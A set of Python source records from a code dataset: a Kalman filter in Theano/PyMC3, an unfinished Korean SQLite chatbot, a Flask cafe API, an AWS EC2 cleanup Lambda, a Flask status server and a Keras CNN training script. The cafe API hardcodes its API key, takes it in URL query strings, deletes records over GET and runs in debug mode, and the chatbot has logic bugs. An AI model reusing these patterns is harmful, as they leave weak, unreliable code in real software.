def __init__(self, Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g,\n *args, **kwargs):\n Continuous.__init__(self, *args, **kwargs)\n\n self._kalman_theano = KalmanTheano(Phi, Q, L, c, H, Sv, d, s0, P0,\n n, m, g, **kwargs)\n self.mean = tt.as_tensor_variable(0.)\n return\n\n def logp(self, Y):\n (_, _, log_p), _ = self._kalman_theano.filter(Y)\n return log_p\n\n\nif __name__ == \"NONAME\":\n n = 3\n m = 10\n\n T = 2048\n phi = 0.99\n v = np.random.normal(size=(T, m))\n Y = np.zeros((T, m))\n Y[0, :] = v[0, :]\n for t, vt in enumerate(v[1:]):\n Y[t + 1, :] = phi * Y[t, :] + vt\n\n sv_tnsr = tt.vector(\"sv\")\n Sv_tnsr = tt.diag(sv_tnsr)\n\n # def __init__(self, Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g,\n K = KalmanTheano(Phi=0.92 * np.eye(n), Q=0.2 * np.eye(n),\n L=np.eye(n), c=np.zeros(n),\n H=np.random.normal(size=(m, n)),\n Sv=Sv_tnsr,\n d=np.zeros(m),\n s0=np.zeros(n),\n P0=10 * np.eye(n),\n n=n, m=m, g=n)\n Y_tensor = tt.matrix(\"Y\")\n (s, P, ll), _ = K.filter(Y_tensor)\n kf = theano.function(inputs=[Y_tensor, sv_tnsr], outputs=[s, P, ll],\n mode=theano.Mode(optimizer=\"unsafe\"))\n\n s, P, ll = kf(Y, 2 * np.ones(m))\n\n import pymc3 as pm\n\n with pm.Model() as model:\n # Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g\n\n phi = pm.Normal(\"phi\", shape=(1, 1))\n q = pm.HalfStudentT(\"q\", nu=1.0, sd=2.0, shape=(1, 1))\n K = KalmanFilter(\"kf\", phi, q,\n np.array([[1.]]),\n np.array([0.]),\n np.array([[1.]]),\n np.array([[0.0]]),\n np.array([0.]),\n np.array([0.]),\n np.array([[10.]]),\n 1, 1, 1,\n observed=y)\n\n with model:\n # approx = pm.fit(n=100, method=\"advi\")\n trace = pm.sample_approx(approx, draws=500)\n", "sub_path": "kalman/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 9969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "theano.tensor.slinalg", "line_number": 7, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 7, "usage_type": "name"}, {"api_name": "theano.tensor.slinalg", "line_number": 8, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 8, "usage_type": "name"}, {"api_name": "theano.tensor.slinalg.cholesky", "line_number": 26, "usage_type": "call"}, {"api_name": "theano.tensor.slinalg", "line_number": 26, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 26, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 42, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 42, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 43, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 43, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 46, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 47, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 47, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 52, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 52, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 53, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 53, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 54, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 54, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 55, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 55, "usage_type": "name"}, {"api_name": "theano.tensor.log", "line_number": 62, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 62, "usage_type": "name"}, {"api_name": "theano.tensor.diag", "line_number": 62, "usage_type": "call"}, {"api_name": "theano.tensor.nlinalg.norm", "line_number": 63, "usage_type": "call"}, {"api_name": "theano.tensor.nlinalg", "line_number": 63, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 64, "usage_type": "attribute"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 74, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 74, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 77, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 77, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 80, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 80, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 83, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 83, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 86, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 86, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 89, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 89, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 92, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 92, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 95, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 95, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 98, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 98, "usage_type": "name"}, {"api_name": "theano.scan", "line_number": 154, "usage_type": "call"}, {"api_name": "pymc3.distributions.Continuous", "line_number": 166, "usage_type": "name"}, {"api_name": "pymc3.distributions.Continuous.__init__", "line_number": 236, "usage_type": "call"}, {"api_name": "pymc3.distributions.Continuous", "line_number": 236, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 240, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 240, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 255, "usage_type": "call"}, {"api_name": "theano.tensor.vector", "line_number": 260, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 260, "usage_type": "name"}, {"api_name": "theano.tensor.diag", "line_number": 261, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 261, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 270, "usage_type": "call"}, {"api_name": "theano.tensor.matrix", "line_number": 272, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 272, "usage_type": "name"}, {"api_name": "theano.function", "line_number": 274, "usage_type": "call"}, {"api_name": "theano.Mode", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 277, "usage_type": "call"}, {"api_name": "pymc3.Model", "line_number": 281, "usage_type": "call"}, {"api_name": "pymc3.Normal", "line_number": 284, "usage_type": "call"}, {"api_name": "pymc3.HalfStudentT", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "pymc3.sample_approx", "line_number": 299, "usage_type": "call"}]} +{"seq_id": "31780394", "text": "import sqlite3\ndef chat(msg):\n chat_message = str(msg)\n answer = \"제가 아직 모르는 말입니다.\"\n conn = sqlite3.connect('chat.db')\n conn = cur = conn.cursor()\n cur.execute(\"select * from chat\")\n rows = cur.fetchall()\n for row in rows:\n if row[0] == chat_message:\n answer = row[1]\n return(answer)\ndef teach(q,a):\n search = chat(q)\n if search != \"제가 아직 모르는 말입니다.\":\n return(\"이미 학습된 말입니다.\")\n #20180905 만들다 말음\n\nif __name__ == '__main__':\n mode = 2\n inputstr = input(\"관리자 모드입니다. - 번호를 입력하세요. \\n1. 데이터베이스 추가\\n2. 채팅 테스트\")\n if inputstr == 1: mode = 1\n if inputstr == 2: mode = 2\n if not inputstr == 1 or inputstr == 2:\n print(\"잘못된 명령입니다.\")\n exit()\n if mode == 1:\n while(True):\n in_str = input(\"채팅 모드입니다. - 채팅을 입력해보세요. - 나가기 \\q\")\n if in_str == \"\\q\":\n print(\"종료합니다.\")\n else:\n chat(in_str)\n", "sub_path": "chat_module.py", "file_name": "chat_module.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "268278118", "text": "from logging import error\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy, sqlalchemy\nimport random\n\n\napp = Flask(__name__)\nAPI_KEY = \"SecretKey\"\n\n##Connect to Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///cafes.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\n#Cafe TABLE Configuration\nclass Cafe(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), unique=True, nullable=False)\n map_url = db.Column(db.String(500), nullable=False)\n img_url = db.Column(db.String(500), nullable=False)\n location = db.Column(db.String(250), nullable=False)\n seats = db.Column(db.String(250), nullable=False)\n has_toilet = db.Column(db.Boolean, nullable=False)\n has_wifi = db.Column(db.Boolean, nullable=False)\n has_sockets = db.Column(db.Boolean, nullable=False)\n can_take_calls = db.Column(db.Boolean, nullable=False)\n coffee_price = db.Column(db.String(250), nullable=True)\n\n# All records fetched from DB\ncafes = db.session.query(Cafe).all()\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\",cafes=cafes)\n\n# gets random coffee place\n@app.route(\"/random\") \ndef random_cafe():\n random_cafe = random.choice(cafes)\n return jsonify(\n cafe={\n \"can_take_calls\":random_cafe.can_take_calls,\n \"coffee_price\":random_cafe.coffee_price,\n \"has_sockets\":random_cafe.has_sockets,\n \"has_toilet\":random_cafe.has_toilet,\n \"has_wifi\":random_cafe.has_wifi,\n \"id\":random_cafe.id,\n \"img_url\":random_cafe.img_url,\n \"location\":random_cafe.location,\n \"map_url\":random_cafe.map_url,\n \"name\":random_cafe.name,\n \"seats\":random_cafe.seats\n }\n )\n\n# gets all the coffee place from DB\n@app.route(\"/all\")\ndef all_cafe():\n cafe_list = []\n\n for cafe in cafes:\n cafe_ = {\n \"can_take_calls\":cafe.can_take_calls,\n \"coffee_price\":cafe.coffee_price,\n \"has_sockets\":cafe.has_sockets,\n \"has_toilet\":cafe.has_toilet,\n \"has_wifi\":cafe.has_wifi,\n \"id\":cafe.id,\n \"img_url\":cafe.img_url,\n \"location\":cafe.location,\n \"map_url\":cafe.map_url,\n \"name\":cafe.name,\n \"seats\":cafe.seats\n }\n cafe_list.append(cafe_)\n\n return jsonify(cafe = cafe_list)\n\n# searches for a coffee place at mentioned location\n@app.route(\"/search\")\ndef search():\n loc = request.args.get(\"loc\") \n\n cafe_ = Cafe.query.filter_by(location=loc).first()\n\n try:\n return jsonify(\n cafe={\n \"can_take_calls\":cafe_.can_take_calls,\n \"coffee_price\":cafe_.coffee_price,\n \"has_sockets\":cafe_.has_sockets,\n \"has_toilet\":cafe_.has_toilet,\n \"has_wifi\":cafe_.has_wifi,\n \"id\":cafe_.id,\n \"img_url\":cafe_.img_url,\n \"location\":cafe_.location,\n \"map_url\":cafe_.map_url,\n \"name\":cafe_.name,\n \"seats\":cafe_.seats\n }\n )\n except AttributeError:\n return jsonify(\n error=\"Sorry, we don't have cafe at that location.\"\n ), 404\n\n# update the record of a coffee place by searching for it using id\n@app.route(\"/update-price/\")\ndef update_price(id):\n updated_price = request.args.get(\"new_price\")\n api_key = request.args.get(\"api_key\")\n\n if api_key == API_KEY:\n try:\n price_update = Cafe.query.get(int(id))\n price_update.coffee_price = updated_price\n db.session.commit()\n return jsonify(\n success=\"Succesfully updated the price\"\n ), 200\n except AttributeError:\n return jsonify(\n error={\n \"Not found\": \"Sorry no coffee house exist with that id\"\n }\n ), 404\n else:\n return jsonify(error=\"Invalid API Key\")\n\n@app.route(\"/report-closed/\")\ndef delete_record(id):\n api_key = request.args.get(\"api_key\")\n if api_key == API_KEY:\n try:\n cafe_ = Cafe.query.get(int(id))\n db.session.delete(cafe_)\n db.session.commit()\n\n return jsonify(success = \"Succesfully deleted the record\")\n except sqlalchemy.orm.exc.UnmappedInstanceError:\n return jsonify(\n error = {\n \"Not Found\": \"Sorry the id isn't valid.\"\n }\n )\n else:\n return jsonify(\n error = {\n \"Not Found\": \"Sorry the api key isn't valid.\"\n }\n )\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 112, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 112, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 112, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 140, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.sqlalchemy.orm", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy.sqlalchemy", "line_number": 141, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 148, "usage_type": "call"}]} +{"seq_id": "285629200", "text": "from __future__ import print_function\nimport boto3\nimport logging\nimport datetime\nfrom datetime import date\n\n\ndef lambda_handler(event, context):\n \n\t#CHANGE \n regions = [\"region1\", \"region2\"]\n \n for region in regions:\n ec2 = boto3.resource('ec2', region_name=region)\n ec2client = boto3.client('ec2', region_name=region)\n response = ec2client.describe_instances()\n # print(response)\n \n\t\t#CHANGE \n my_images = ec2.images.filter(Owners=[ACCOUNT_ID])\n for image in my_images:\n for tags in image.tags:\n if tags[\"Key\"] == 'RemoveOn':\n #If today is the removal date, terminate it\n if tags['Value'] == date.today().strftime('%d-%m-%Y'):\n print(\"Deregistering \" + image.id + \" in \" + region)\n ec2client.deregister_image(ImageId=image.id)\n \n for instance in ec2.instances.all():\n for tags in instance.tags:\n #If instance has a specific removal date\n if tags[\"Key\"] == 'RemoveOn':\n #If today is the removal date, terminate it\n if tags['Value'] == date.today().strftime('%d-%m-%Y'):\n print(\"Terminating EC2 \" + instance.id + \" in \" + region)\n ec2.Instance(instance.id).stop()\n #print(ec2.Instance(instance.id).stop())\n", "sub_path": "EC2Cleanup.py", "file_name": "EC2Cleanup.py", "file_ext": "py", "file_size_in_byte": 1443, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "boto3.resource", "line_number": 14, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "16411001", "text": "import socket, json, psutil, multiprocessing, requests\r\n\r\nfrom flask import Flask, jsonify\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/status\")\r\ndef status():\r\n hostname = socket.gethostname()#Get hostname\r\n IP = socket.gethostbyname(hostname)#Get IP Address\r\n CPU = multiprocessing.cpu_count()\r\n RAM = psutil.virtual_memory().total / (1024.0 ** 3)\r\n return jsonify({'Hostanme' : hostname,\r\n 'IP Address' : IP,\r\n 'Amount of CPU Cores' : CPU,\r\n 'RAM in GBs' : round(RAM,3)\r\n })\r\n\r\nif __name__ == '__main__':\r\n app.run(host='127.0.0.1',port=8080, debug=True)\r\n", "sub_path": "Flask_Server.py", "file_name": "Flask_Server.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 8, "usage_type": "call"}, {"api_name": "socket.gethostbyname", "line_number": 9, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 10, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "107050691", "text": "\n# coding: utf-8\n\n# In[ ]:\n\n\nimport keras.models\nfrom keras import backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import Adadelta, adam\nfrom keras.callbacks import ModelCheckpoint\nimport numpy as np\nfrom keras import regularizers\nfrom keras.constraints import maxnorm\nimport matplotlib.pyplot as plt\n\n\n# In[ ]:\n\n\nX = np.load('influ_selected_model2_train_input.npy')\nY = np.load('influ_selected_model2_train_outputdim2.npy')\n\n\n# In[ ]:\n\n\n#X_test = np.load(\"/Users/TN/Desktop/influ_selected_model2_test_input.npy\")\n#Y_test = np.load(\"/Users/TN/Desktop/influ_selected_model2_test_outputdim2.npy\")\n\n\n# In[ ]:\n\n\nK.image_data_format()\n\n\n# In[ ]:\n\n\nconv_layer = [ \n # convolution and then pooling\n Conv2D(20, (7, 7), input_shape=(1024,1360,1), name='first_conv_layer',padding='valid'),\n Activation('relu'),\n MaxPooling2D(pool_size=(10, 10), padding='valid'),\n\n # convolution and then pooling\n Conv2D(25, (5, 5), name='second_conv_layer', padding='valid'),\n Activation('relu'),\n MaxPooling2D(pool_size=(6, 6), padding='valid'),\n \n # convolution and then pooling\n Conv2D(30, (3, 3), name='third_conv_layer', padding='valid'),\n Activation('relu'),\n MaxPooling2D(pool_size=(6, 6), padding='valid')\n]\n\nfc_layer = [\n # flatten and connect with three fully connected layer\n Flatten(),\n Dense(100, name='fc_layer_100_1'),\n Activation('sigmoid'),\n Dense(100, name='fc_layer_100_2',kernel_constraint= maxnorm(1.)),\n Activation('sigmoid'),\n Dense(100, name='fc_layer_100_3',kernel_regularizer=regularizers.l2(0.01)),\n Activation('sigmoid'),\n \n # conneted with smaller fully connected layer\n # with the same number of neurons as the number of classes\n Dense(2, name='fc_layer_2'),\n Activation('softmax')\n]\n\n\n# In[ ]:\n\n\nmodel = Sequential(conv_layer + fc_layer)\nmodel.compile(loss=\"binary_crossentropy\",\n optimizer=adam(lr=0.0001),\n metrics=['accuracy'])\n\n\n# In[ ]:\n\n\nmodel.summary()\n\n\n# In[ ]:\n\n\nfilepath=\"influ_0816_filter-{epoch:02d}-acc_{acc:.2f}.hdf5\"\ncheckpoint = ModelCheckpoint(filepath, monitor='acc', verbose=1, save_best_only=True, save_weights_only=True, mode='auto')\ncallbacks_list = [checkpoint]\n\n\n# In[ ]:\n\n\nhistory = model.fit(X, Y, batch_size=15, epochs=1200, callbacks=callbacks_list, verbose=1, validation_split=0.2, shuffle=True)\n\n\n# In[ ]:\n\n\nmodel.save_weights('0816_influ_filter_model2.h5')\nmodel.save('0816_influ_filter_model_2')\n\n\n# In[ ]:\n\n\nplt.plot(history.history['loss'])\n\nplt.plot(history.history['val_loss'])\n\nplt.title(\"model 2 loss\")\n\nplt.ylabel(\"loss\")\n\nplt.xlabel(\"epoch\")\n\nplt.legend([\"train\",\"test\"],loc=\"upper left\")\n\nplt.savefig(\"model_2_loss\")\n\nplt.savefig(\"model_2_loss.pdf\")\n\nplt.close('all')\n\n# In[ ]:\n\n\nplt.plot(history.history['acc'])\n\nplt.plot(history.history['val_acc'])\n\nplt.title(\"model 2 acc\")\n\nplt.ylabel(\"acc\")\n\nplt.xlabel(\"epoch\")\n\nplt.legend([\"train\",\"test\"],loc=\"upper left\")\n\nplt.savefig(\"model_2_acc\")\n\nplt.savefig(\"model_2_acc.pdf\")\n\nplt.close('all')\n\n\n\n\nplt.plot(history.history['loss'])\n\nplt.plot(history.history['val_loss'])\n\nplt.plot(history.history['acc'])\n\nplt.plot(history.history['val_acc'])\n\nplt.title(\"model 2 \")\n\nplt.ylabel(\"loss/acc\")\n\nplt.xlabel(\"epoch\")\n\nplt.legend([\"train_loss\",\"test_loss\",\"train_acc\",\"test_acc\"],loc=\"upper left\")\n\nplt.savefig(\"model_2\")\n\nplt.savefig(\"model_2.pdf\")\n\nplt.close('all')\n\n\n\n\n", "sub_path": "Training2/influ_CPE_0816_training2.py", "file_name": "influ_CPE_0816_training2.py", "file_ext": "py", "file_size_in_byte": 3545, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.load", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.backend.image_data_format", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 38, "usage_type": "name"}, {"api_name": "keras.layers.Conv2D", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.constraints.maxnorm", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.layers.Activation", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.optimizers.adam", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}]} +{"seq_id": "457463419", "text": "from mutagen.easyid3 import 